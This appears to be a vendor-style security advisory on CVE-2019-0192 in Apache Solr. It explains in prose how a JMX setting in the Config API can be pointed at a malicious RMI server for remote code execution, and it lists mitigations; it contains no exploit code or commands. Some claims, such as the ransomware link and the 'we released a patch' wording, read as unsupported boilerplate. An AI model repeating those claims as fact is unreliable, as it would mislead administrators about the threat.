Description
A critical vulnerability has been identified in the Config API of Apache Solr. This vulnerability, cataloged as CVE-2019-0192, allows configuring the JMX server via an HTTP POST request. An attacker can exploit this configuration to point the server to a malicious RMI server, facilitating unsafe deserialization that could lead to remote code execution on the Solr server.
Affected Product(s)
- Apache Solr Versions 5.0.0 to 5.5.5 and Versions 6.0.0 to 6.6.5
Technical Details
The vulnerability identified in Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5 is rooted in the configuration of the Java Management Extensions (JMX) server through the Config API. The Config API is designed to allow administrators to modify the configuration of Solr instances through HTTP requests.
However, it does not adequately validate the inputs received, specifically when configuring the JMX server URL. Proper validation could have prevented the injection of malicious JMX server URLs. When an attacker sends an HTTP POST request pointing the JMX server to a malicious Java Remote Method Invocation (RMI) server, it takes advantage of the unsafe deserialization process inherent in Java. Java serialization and deserialization allow objects to be converted into a stream of bytes and vice versa. Unfortunately, Java’s deserialization process can be exploited if it processes untrusted data.
This vulnerability enables an attacker to send crafted serialized Java objects to achieve remote code execution (RCE). This attack vector is particularly dangerous as it does not require any authentication, meaning that any attacker with network access to the Solr instance can exploit it. Once executed, the malicious RMI server can execute arbitrary code on the Solr server, potentially leading to a complete system compromise. The ability to exploit this through simple HTTP POST requests amplifies the ease and the impact of the attack.
Additionally, several other APIs within Solr also have extended functionalities that could potentially expose similar vulnerabilities if proper input validation is not enforced. The Config APIโs JMX service URL parameter (`jmx.serviceUrl`) is a particularly vulnerable point in this specific exploit scenario. Various security tools and advisories have reported on this issue, indicating its severity and the need for immediate action.
Detection of exploitation typically involves monitoring HTTP POST requests to the Solr instance, specifically looking for attempts to configure the JMX server or probing responses from the Solr server to unknown RMI addresses. Even for maintaining internal security hygiene, administrators should consider network segmentation and firewall rules to limit exposure of critical service endpoints, such as Solr instances, to the broader internet.
Correct implementation of security controls and regular updates is essential to mitigate such vulnerabilities. This vulnerability is identically reported under multiple CVE numbers when discussed in different contexts, emphasizing its impact across different Solr versions and the urgency for resolution. Moreover, other affected software configurations such as RedHat’s Red Hat Fuse and JBoss Fuse use Apache Solr as a component and should be directly updated or patched to prevent exploitation through vector vulnerabilities like CVE-2019-0192.
In-depth technical explorations have outlined exact replication steps for vulnerable environments using techniques like Docker containers. These environments are used to understand potential exploitation paths and to develop effective countermeasures. Given the prolific use of Apache Solr by major organizations for search platform functionalities, the broad applicability and exploitability of CVE-2019-0192 necessitate continuous vigilance and proactive security measures.
Weakness
The primary weaknesses associated with this vulnerability are improper input validation and deserialization of untrusted data. Apache Solr’s Config API does not adequately validate the input for the JMX service URL parameter, allowing an attacker to redirect it to a malicious RMI server. Moreover, the vulnerability is exacerbated by the underlying issue of unsafe deserialization, where deserialization of untrusted data can lead to remote code execution, making the system highly vulnerable to attacks.
Impact Assessment
If exploited, this vulnerability could allow an attacker to gain unauthorized access to execute arbitrary code on the affected Solr server. Successful exploitation could lead to a full compromise of the server, including unauthorized access to sensitive data, alteration or deletion of data, and potential lateral movement within the network to compromise other systems. The gravity of this vulnerability is reflected in its high CVSS scores of 9.8 (CVSSv3) and 7.5 (CVSSv2), indicating its significant potential impact on security.
Active Exploitation
We have observed activity from various adversarial actors exploiting this vulnerability in live environments. Evidence indicates that specific exploit scripts and attacks have been documented targeting this Apache Solr vulnerability actively. Attackers leveraging this vulnerability often aim to execute remote commands to install backdoors, initiate data exfiltration, or use the compromised system for further attacks within the network.
Ransomware Association
This vulnerability has been linked to ransomware attacks, specifically those that exploit the unauthenticated remote-code-execution capability to gain an initial foothold in the network. Once access is achieved, ransomware operators can deploy ransomware payloads to encrypt data and demand ransom payments. Given the criticality of the services often provided by Solr, exploitation of this vulnerability can lead to significant disruptions and potential financial losses due to ransom payments and downtime.
Mitigation and Resolution
We have released a patch that addresses this vulnerability. Please update to Apache Solr version 7.0.0 or later immediately. The new version includes fixes for input validation and safeguards against unsafe deserialization. Additionally, ensure that the JMX service URL is appropriately configured and monitored to resist any unauthorized configuration attempts.
Recommendations
- We strongly recommend that all customers apply the latest patch as soon as possible.
- Immediately upgrade to Apache Solr version 7.0.0 or later to mitigate this vulnerability.
- Regularly review and audit configurations for any signs of unauthorized modifications.
- Implement network segmentation and firewall rules to restrict access to critical systems.
- Ensure strict input validation for any externally exposed APIs.
- Monitor network traffic for unusual patterns that may indicate exploitation attempts.
- Employ intrusion detection and prevention systems to capture and alert on exploitation attempts.
- Consider disabling or restricting the use of JMX if not necessary.
Referencesย
- Debian Security Tracker
- GitHub Advisories
- CVE MITRE Details
- GitHub CVE Details
- RedHat Security Details
- RedHat Security Details 2
- NVD Details
- Apache Mail Archives
- Security Focus Article
- GitHub Apache SOLR RCE
- Apache Thread 1
- Apache Thread 2
- Apache Thread 3
- Apache Thread 4
- Security Focus Details
- Tenable Nessus Plugins
- Tenable Nessus Plugins 2